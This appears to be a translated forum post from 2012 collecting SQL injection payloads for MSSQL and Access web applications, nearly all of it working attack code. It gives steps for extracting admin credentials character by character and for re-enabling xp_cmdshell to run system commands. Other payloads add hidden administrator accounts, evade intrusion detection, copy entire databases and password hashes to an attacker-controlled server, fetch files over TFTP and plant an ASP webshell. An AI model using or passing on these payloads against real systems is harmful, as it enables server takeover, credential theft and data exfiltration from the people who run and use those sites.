SQL Injection Statements 2

Posted 2012-9-15 14:32:40
1. Check for an injection point
and 1=1
and 1=2
(If the page renders normally with "and 1=1" and breaks with "and 1=2", the parameter is injectable.)

2. Guess table names. Typical table names are admin, adminuser, user, pass, password, etc.
and 0<>(select count(*) from <table>)
and 0<>(select count(*) from admin) --- tests whether the table admin exists

3. Guess the number of accounts. If "0<" returns the normal page and "1<" returns the error page, there is exactly one account.
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
Column names can also be guessed with: and (select count(<column>) from <table>)>0

4. Guess column names: put the candidate column name inside len().
and 1=(select count(*) from admin where len(<column>)>0)--
and 1=(select count(*) from admin where len(name)>0) --- username column
and 1=(select count(*) from admin where len(password)>0) --- password column

5. Guess the length of each field: keep changing the ">0" until the page returns normally.
and 1=(select count(*) from admin where len(<column>)>0)
and 1=(select count(*) from admin where len(name)>6) error
and 1=(select count(*) from admin where len(name)>5) normal, so the length is 6
and 1=(select count(*) from admin where len(name)=6) normal

and 1=(select count(*) from admin where len(password)>11) normal
and 1=(select count(*) from admin where len(password)>12) error, so the length is 12
and 1=(select count(*) from admin where len(password)=12) normal
Length can also be guessed with: and (select top 1 len(username) from admin)>5

6. Guess the characters
and 1=(select count(*) from admin where left(name,1)='a') --- guess the first character of the username
and 1=(select count(*) from admin where left(name,2)='ab') --- guess the second character
Keep adding one character at a time until you reach the length guessed above; that gives you the account name.

Content can also be guessed by character code: and (select top 1 asc(mid(password,1,1)) from admin)>50
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
This form can also recover Chinese usernames and passwords: swap the number for the character's code and convert the results back to characters afterwards. Note that asc() and mid() are Access (Jet/VBA) functions; on SQL Server use ascii(substring(col,i,1)), or unicode(substring(col,i,1)) for non-ASCII characters.

group by users.id having 1=1--
group by users.id, users.username, users.password, users.privs having 1=1--
(The GROUP BY ... HAVING 1=1 form makes the server raise an error naming the next column that is missing from the GROUP BY list; add each reported column until the error stops and you have all the column names.)
; insert into users values( 666, 'attacker', 'foobar', 0xffff )--

UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id')--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id','login_name')--
UNION SELECT TOP 1 login_name FROM logintable--
UNION SELECT TOP 1 password FROM logintable where login_name='Rahul'--

Check the server's patch level: the conversion error reveals the version string, e.g. whether SP4 is installed
and 1=(select @@VERSION)--

Check the privileges of the database connection account. A normal page means the account is in the sysadmin server role.
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))--

Identify the connection account. (Normal page = the connection uses the sa account.)
and 'sa'=(SELECT System_user)--
and user_name()='dbo'--
and 0<>(select user_name())--

Check whether xp_cmdshell has been removed
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')--

If xp_cmdshell was dropped, restore it; an absolute path to the DLL is supported
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'--

Reverse ping to your own host (confirms command execution)
;use master;declare @s int;exec sp_oacreate 'wscript.shell',@s out;exec sp_oamethod @s,'run',NULL,'cmd.exe /c ping 192.168.0.1';--

Add an account
;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'--

Create a virtual directory pointing at the E: drive:
;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"'--

Set the access properties (combine with writing a webshell):
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'

MSSQL also supports UNION queries
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union also works on Access)

Database-path disclosure trick: %5c is the URL encoding of "\"; replace the "/" or "\" in the URL with %5c and submit.

Get the web root path
;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1 swappass from swap)=1-- (the char-to-int conversion error leaks the value)
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', @value=@test OUTPUT insert into newtable(paths) values(@test)--
;use ku1;--
;create table cmd (str image);-- create a table cmd with an image column

Test procedure when xp_cmdshell exists:
;exec master..xp_cmdshell 'dir'
;exec master.dbo.sp_addlogin 'jiaoniang$';-- add a SQL login
;exec master.dbo.sp_password null,'1866574','jiaoniang$';-- set its password (arguments are old password, new password, login)
;exec master.dbo.sp_addsrvrolemember 'jiaoniang$','sysadmin';--
;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$ /add';--
exec master..xp_servicecontrol 'start','schedule' -- start a service
exec master..xp_servicecontrol 'start','server'
;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'
;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add'
;exec master..xp_cmdshell 'tftp -i yourip get file.exe'-- upload a file over TFTP

;declare @a sysname;set @a=db_name();backup database @a to disk='\\yourip\yourshare\bak.dat'
If xp_cmdshell is restricted, this works instead:
select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec master.dbo.sp_addlogin hax')

Query construction:
SELECT * FROM news WHERE id=... AND topic=... AND .....
admin' and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass <> '
select 123;--
;use master;--
a' or name like 'fff%';-- shows there is a user called ffff
and 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--
;update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';--
;update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--
;update [users] set email=(select top 1 count(id) from password) where name='ffff';--
;update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--
;update [users] set email=(select top 1 name from password where id=2) where name='ffff';--
The statements above fetch the first user table in the database and store its name in the email field of user ffff.
Viewing ffff's profile then shows that the first user table is called ad.
From the table name ad you get that table's id, and from the id the name of the second table.

insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
insert into users values( 667,'123','123',0xffff)--
insert into users values ( 123, 'admin''--', 'password', 0xffff)--
;and user>0 -- the conversion error reveals the current user name
;and (select count(*) from sysobjects)>0 -- SQL Server
;and (select count(*) from msysobjects)>0 // Access database (its system table is MSysObjects)

Enumerate table names
;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--
This writes the first table name into the aaa column of table aaa.
Read out the first table; the second is read the same way (append "and name<>'<table you just got>'" to the condition).
;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'vote');--
then id=1552 and exists(select * from aaa where aaa>5)
Read out the second table, and so on one by one until none are left.
Reading columns works like this:
;update aaa set aaa=(select top 1 col_name(object_id('<table>'),1));--
then id=152 and exists(select * from aaa where aaa>5) errors, and the error reveals the column name
;update aaa set aaa=(select top 1 col_name(object_id('<table>'),2));--
then id=152 and exists(select * from aaa where aaa>5) errors, and the error reveals the column name

[Get table names][update a column to the table name, then find a way to read that column and you have the table name]
update <table> set <column>=(select top 1 name from sysobjects where xtype='u' and status>0 [ and name<>'<table you got>', adding one for each table found]) [ where <condition>]
select top 1 name from sysobjects where xtype='u' and status>0 and name not in('table1','table2',…)
Creating database-administrator and system-administrator accounts through a SQL Server injection requires the current account to be in the SYSADMIN role.

[Get column names][update a column to the column name, then read that column the same way]
update <table> set <column>=(select top 1 col_name(object_id('<table to query>'),<column ordinal, e.g. 1>)) [ where <condition>]

Evading IDS detection [using variables]
;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
;declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'

1. Open a remote database
Basic syntax
select * from OPENROWSET('SQLOLEDB','server=servername;uid=sa;pwd=123','select * from table1')
Parameters: (1) the OLE DB provider name
2. The connection string can target any port, for example
select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table')
3. Copy the target host's entire database: insert every table of the target into a table on your own server.

Basic syntax:
insert into OPENROWSET('SQLOLEDB','server=servername;uid=sa;pwd=123','select * from table1') select * from table2
This statement copies all rows of table2 on the target host into table1 on the remote (your own) database; the receiving table must already exist there with a matching column layout. In practice adjust the IP address and port in the connection string to point where you need, for example:
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table1') select * from table2
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysdatabases') select * from master.dbo.sysdatabases
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysobjects') select * from user_database.dbo.sysobjects
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _syscolumns') select * from user_database.dbo.syscolumns
Copy a database:
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table1') select * from database..table1
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table2') select * from database..table2

Copy the password hashes. Login password hashes are stored in sysxlogins. Method:
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysxlogins') select * from database.dbo.sysxlogins
Once you have the hashes you can brute-force them.

Directory traversal: first create a temporary table temp
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- list all drives
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- list subdirectories
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- get the whole subdirectory tree and store it in temp (xp_dirtree is executable by PUBLIC)
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- view a file's contents
;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--
;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc'
Check the server-role membership of the connection account:
Statement 1: and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
Statement 2: and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--
Statement 3: and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
Statement 4: and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
Statement 5: and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
Statement 6: and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
Statement 7: and 1=(SELECT IS_MEMBER('db_owner'));--

Write the paths into a table and read them back:
;create table dirs(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_dirtree 'c:\'--
and 0<>(select top 1 paths from dirs)--
and 0<>(select top 1 paths from dirs where paths not in('@Inetpub'))--
;create table dirs1(paths varchar(100), id int)--
;insert dirs1 exec master.dbo.xp_dirtree 'e:\web'--
and 0<>(select top 1 paths from dirs1)--

Back up the database into the web directory, then download it:
;declare @a sysname; set @a=db_name();backup database @a to disk='e:\web\down.bak';--

and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
and 1=(Select Top 1 col_name(object_id('USER_LOGIN'),1) from sysobjects) -- look at the related table
and 1=(select user_id from USER_LOGIN)
and 0=(select user from USER_LOGIN where user>1)

-=- wscript.shell example -=-
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'--

Read a file line by line through scripting.filesystemobject:
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end

Write an ASP webshell into the web root:
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
'<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>'

declare @o int, @ret int
exec sp_oacreate 'speech.voicetext', @o out
exec sp_oamethod @o, 'register', NULL, 'foo', 'bar'
exec sp_oasetproperty @o, 'speed', 150
exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to,us', 528
waitfor delay '00:00:05'

; declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528 waitfor delay '00:00:05'--

xp_dirtree is executable by PUBLIC
exec master.dbo.xp_dirtree 'c:\' returns two columns, subdirectory and depth. subdirectory is a character column and depth is an integer column.
create table dirs(paths varchar(100), id int)
Create the table to match what xp_dirtree returns above: the same number of columns with the same types.
insert dirs exec master.dbo.xp_dirtree 'c:\'
As long as the table we create matches the column definitions the stored procedure returns, the insert succeeds and we capture its output in a table, collecting the information we want step by step.